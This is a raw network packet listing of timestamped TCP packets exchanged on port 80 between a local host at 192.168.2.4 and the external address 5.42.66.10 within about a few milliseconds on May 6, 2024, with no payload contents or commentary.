May 6, 2024 07:53:04.518140078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518140078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518162012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518162966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518174887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518184900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518186092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518220901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518245935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518246889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518256903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518268108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518281937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518286943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518295050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518312931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518342018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518342972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518356085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518366098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518377066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518379927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518388987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518400908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518413067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518414974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518424034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518435955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518445969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518450022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518461943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518470049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518484116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518495083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518496990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518511057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518522978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518526077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518537045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518548965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518548965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518560886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518569946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518573046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518584967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518595934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518600941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518609047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518631935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518632889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518644094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518655062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518656015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518682003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518683910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518693924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518704891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518712044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518718958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518743038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518771887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518795013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518806934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518817902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518830061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518832922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518841982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518853903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518863916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518897057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518908978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518922091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518932104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518943071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518949032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518956900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518969059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518979073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.518980026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.518991947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519004107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519011021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519016027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519027948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519033909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519042969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519056082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519068003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519074917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519074917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519081116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519092083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519100904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519104004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519114971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519133091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519133091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519145966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519153118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519157887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519167900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519176006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519181013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519193888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519205093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519206047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519217014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519227982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519238949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519241095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519253969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519257069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519284010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519313097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519355059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519367933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519377947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519390106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519397020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519402027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519413948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519419909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519429922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519443035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519445896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519457102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519469023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519470930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519479990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519491911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519491911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519505024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519516945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519521952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519530058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519541025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519552946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519553900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519563913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519573927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519603968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519634008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519645929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519659996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519670010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519671917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519685030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519696951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519704103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519706964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519735098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519756079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519757986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519768953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519779921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519790888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519793987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519804001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519814968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519817114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519829035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519846916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519848108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519857883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519948006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519961119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519968987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519968987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519972086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.519983053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.519984007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520020962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520045996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520051956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520062923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520072937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520086050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520103931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520104885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520117044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520128965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520128965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520139933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520147085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520163059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520174980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520183086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520185947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520212889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520216942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520230055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520231962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520241022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520251989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520262003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520263910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520276070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520283937 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520314932 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520333052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520344973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520355940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520378113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520381927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520392895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520401955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520405054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520416975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520427942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520433903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520440102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520443916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520451069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520463943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520474911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520478964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520488024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520499945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520509005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520512104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520530939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520550013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520553112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520565033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520576000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520589113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520589113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520617962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520618916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520629883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520641088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520647049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520653963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520664930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520675898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520705938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520716906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520731926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520744085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520755053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520756960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520790100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520804882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520817041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520827055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520838976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520845890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520849943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520880938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520890951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520903111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520908117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520908117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520925999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520926952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520937920 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520948887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520953894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520961046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520972967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520982981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.520984888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.520996094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521013021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521033049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521065950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521078110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521089077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521100998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521106005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521112919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521123886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521135092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521137953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521147966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521169901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521188021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521205902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521219015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521230936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521241903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521248102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521253109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521277905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521303892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521313906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521327019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521336079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521348000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521359921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521359921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521373987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521384001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521392107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521395922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521406889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521418095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521423101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521437883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521441936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521456003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521461010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521467924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521480083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521495104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521522045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521529913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521542072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521565914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521567106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521579027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521590948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521596909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521603107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521615982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521617889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521647930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521658897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521666050 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521671057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521682024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521693945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521699905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521704912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521717072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521723986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521729946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521740913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521750927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521756887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521764040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521776915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521784067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521787882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521795988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521817923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521842003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521845102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521853924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521863937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521876097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521879911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521891117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521903038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521903992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521915913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521927118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521930933 CEST	49741	80	192.168.2.4	5.42.66.10
